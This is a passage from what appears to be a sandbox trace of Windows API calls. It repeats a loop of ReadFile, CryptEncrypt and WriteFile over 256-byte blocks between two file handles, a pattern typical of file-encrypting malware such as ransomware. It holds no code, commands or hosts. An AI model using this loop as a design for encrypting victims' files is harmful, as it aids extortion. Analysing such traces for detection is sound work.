lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.579] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.579] GetLastError () returned 0x0 [0165.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.579] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.579] GetLastError () returned 0x0 [0165.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.579] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.579] GetLastError () returned 0x0 [0165.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.579] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.579] GetLastError () returned 0x0 [0165.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.579] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.579] GetLastError () returned 0x0 [0165.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.579] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.579] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.579] GetLastError () returned 0x0 [0165.579] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.580] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.580] GetLastError () returned 0x0 [0165.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.580] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.580] GetLastError () returned 0x0 [0165.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.580] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.580] GetLastError () returned 0x0 [0165.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.580] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.580] GetLastError () returned 0x0 [0165.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.580] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.580] GetLastError () returned 0x0 [0165.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.580] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.580] GetLastError () returned 0x0 [0165.580] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.580] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.581] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.581] GetLastError () returned 0x0 [0165.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.581] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.581] GetLastError () returned 0x0 [0165.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.581] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.581] GetLastError () returned 0x0 [0165.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.581] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.581] GetLastError () returned 0x0 [0165.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.581] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.581] GetLastError () returned 0x0 [0165.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.581] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.581] GetLastError () returned 0x0 [0165.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.581] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.582] GetLastError () returned 0x0 [0165.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.582] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.582] GetLastError () returned 0x0 [0165.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.582] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.582] GetLastError () returned 0x0 [0165.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.582] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.582] GetLastError () returned 0x0 [0165.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.582] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.582] GetLastError () returned 0x0 [0165.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.582] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.582] GetLastError () returned 0x0 [0165.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.582] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.582] GetLastError () returned 0x0 [0165.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.583] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.583] GetLastError () returned 0x0 [0165.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.583] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.583] GetLastError () returned 0x0 [0165.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.583] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.583] GetLastError () returned 0x0 [0165.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.583] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.583] GetLastError () returned 0x0 [0165.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.583] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.583] GetLastError () returned 0x0 [0165.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.583] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.583] GetLastError () returned 0x0 [0165.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.583] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.584] GetLastError () returned 0x0 [0165.584] WriteFile (in: 